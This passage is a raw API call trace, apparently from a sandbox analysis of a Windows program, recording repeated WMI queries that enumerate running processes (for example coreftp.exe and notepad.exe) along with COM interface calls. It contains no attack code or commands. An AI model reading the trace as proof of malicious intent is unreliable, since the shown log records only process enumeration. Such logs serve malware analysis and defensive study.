Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b0f8) returned 0x0 [0279.475] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b0f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.475] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b0f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570dd68) returned 0x0 [0279.475] WbemDefPath:IUnknown:Release (This=0x570b0f8) returned 0x0 [0279.475] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dd68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570dd68) returned 0x0 [0279.475] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dd68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.476] WbemDefPath:IUnknown:AddRef (This=0x570dd68) returned 0x3 [0279.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dd68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dd68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dd68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b108) returned 0x0 [0279.476] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b108, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.476] WbemDefPath:IUnknown:Release (This=0x570b108) returned 0x3 [0279.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dd68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.477] WbemDefPath:IUnknown:Release (This=0x570dd68) returned 0x2 [0279.477] WbemDefPath:IUnknown:Release (This=0x570dd68) returned 0x1 [0279.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dd68, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570dd68) returned 0x0 [0279.477] WbemDefPath:IUnknown:AddRef (This=0x570dd68) returned 0x3 [0279.477] WbemDefPath:IUnknown:Release (This=0x570dd68) returned 0x2 [0279.477] WbemDefPath:IWbemPath:SetText (This=0x570dd68, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"") returned 0x0 [0279.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.477] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.478] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.478] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.478] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.478] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.478] IWbemClassObject:Get (in: This=0x5705198, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cdba8*=0, plFlavor=0x27cdbac*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x27cdba8*=8, plFlavor=0x27cdbac*=0) returned 0x0 [0279.478] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0279.478] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0279.478] IWbemClassObject:Get (in: This=0x5705198, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cdba8*=8, plFlavor=0x27cdbac*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="coreftp.exe", varVal2=0x0), pType=0x27cdba8*=8, plFlavor=0x27cdbac*=0) returned 0x0 [0279.478] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0279.478] SysStringByteLen (bstr="coreftp.exe") returned 0x16 [0279.479] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b138, puReturned=0x27bb39c | out: apObjects=0x570b138*=0x5705330, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.501] IUnknown:QueryInterface (in: This=0x5705330, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5705330) returned 0x0 [0279.501] IUnknown:QueryInterface (in: This=0x5705330, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.501] IUnknown:QueryInterface (in: This=0x5705330, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.502] IUnknown:AddRef (This=0x5705330) returned 0x3 [0279.502] IUnknown:QueryInterface (in: This=0x5705330, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.502] IUnknown:QueryInterface (in: This=0x5705330, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.502] IUnknown:QueryInterface (in: This=0x5705330, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5705334) returned 0x0 [0279.503] IMarshal:GetUnmarshalClass (in: This=0x5705334, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.503] IUnknown:Release (This=0x5705334) returned 0x3 [0279.503] IUnknown:QueryInterface (in: This=0x5705330, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.503] IUnknown:Release (This=0x5705330) returned 0x2 [0279.503] IUnknown:QueryInterface (in: This=0x5705330, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5705330) returned 0x0 [0279.503] IUnknown:AddRef (This=0x5705330) returned 0x4 [0279.504] IUnknown:Release (This=0x5705330) returned 0x3 [0279.504] IUnknown:Release (This=0x5705330) returned 0x2 [0279.504] CoTaskMemFree (pv=0x570b138) [0279.504] IUnknown:AddRef (This=0x5705330) returned 0x3 [0279.504] IWbemClassObject:Get (in: This=0x5705330, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.505] IWbemClassObject:Get (in: This=0x5705330, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.505] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"") returned 0x66 [0279.505] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"") returned 0x66 [0279.505] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.505] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.505] IUnknown:Release (This=0x500344) returned 0x1 [0279.506] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b138) returned 0x0 [0279.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b138, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.507] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b138, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570de48) returned 0x0 [0279.507] WbemDefPath:IUnknown:Release (This=0x570b138) returned 0x0 [0279.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x570de48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570de48) returned 0x0 [0279.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x570de48, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.507] WbemDefPath:IUnknown:AddRef (This=0x570de48) returned 0x3 [0279.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x570de48, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x570de48, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.507] WbemDefPath:IUnknown:QueryInterface (in: This=0x570de48, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b148) returned 0x0 [0279.507] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b148, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.508] WbemDefPath:IUnknown:Release (This=0x570b148) returned 0x3 [0279.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x570de48, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.508] WbemDefPath:IUnknown:Release (This=0x570de48) returned 0x2 [0279.508] WbemDefPath:IUnknown:Release (This=0x570de48) returned 0x1 [0279.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x570de48, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570de48) returned 0x0 [0279.508] WbemDefPath:IUnknown:AddRef (This=0x570de48) returned 0x3 [0279.508] WbemDefPath:IUnknown:Release (This=0x570de48) returned 0x2 [0279.508] WbemDefPath:IWbemPath:SetText (This=0x570de48, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2976\"") returned 0x0 [0279.508] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.508] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.509] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.509] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.509] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.509] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.509] IWbemClassObject:Get (in: This=0x5705330, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ce420*=0, plFlavor=0x27ce424*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x27ce420*=8, plFlavor=0x27ce424*=0) returned 0x0 [0279.509] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0279.509] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0279.509] IWbemClassObject:Get (in: This=0x5705330, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ce420*=8, plFlavor=0x27ce424*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="notepad.exe", varVal2=0x0), pType=0x27ce420*=8, plFlavor=0x27ce424*=0) returned 0x0 [0279.509] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0279.509] SysStringByteLen (bstr="notepad.exe") returned 0x16 [0279.509] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b178, puReturned=0x27bb39c | out: apObjects=0x570b178*=0x57054c8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.510] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57054c8) returned 0x0 [0279.510] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.510] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.511] IUnknown:AddRef (This=0x57054c8) returned 0x3 [0279.511] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.511] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.512] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57054cc) returned 0x0 [0279.512] IMarshal:GetUnmarshalClass (in: This=0x57054cc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.512] IUnknown:Release (This=0x57054cc) returned 0x3 [0279.512] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.512] IUnknown:Release (This=0x57054c8) returned 0x2 [0279.512] IUnknown:QueryInterface (in: This=0x57054c8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57054c8) returned 0x0 [0279.512] IUnknown:AddRef (This=0x57054c8) returned 0x4 [0279.512] IUnknown:Release (This=0x57054c8) returned 0x3 [0279.512] IUnknown:Release (This=0x57054c8) returned 0x2 [0279.512] CoTaskMemFree (pv=0x570b178) [0279.513] IUnknown:AddRef (This=0x57054c8) returned 0x3 [0279.513] IWbemClassObject:Get (in: This=0x57054c8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.514] IWbemClassObject:Get (in: This=0x57054c8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.514] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x66 [0279.514] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x66 [0279.514] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.514] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.514] IUnknown:Release (This=0x500344) returned 0x1 [0279.515] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b178) returned 0x0 [0279.515] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b178, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.515] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b178, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570df28) returned 0x0 [0279.515] WbemDefPath:IUnknown:Release (This=0x570b178) returned 0x0 [0279.515] WbemDefPath:IUnknown:QueryInterface (in: This=0x570df28, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570df28) returned 0x0 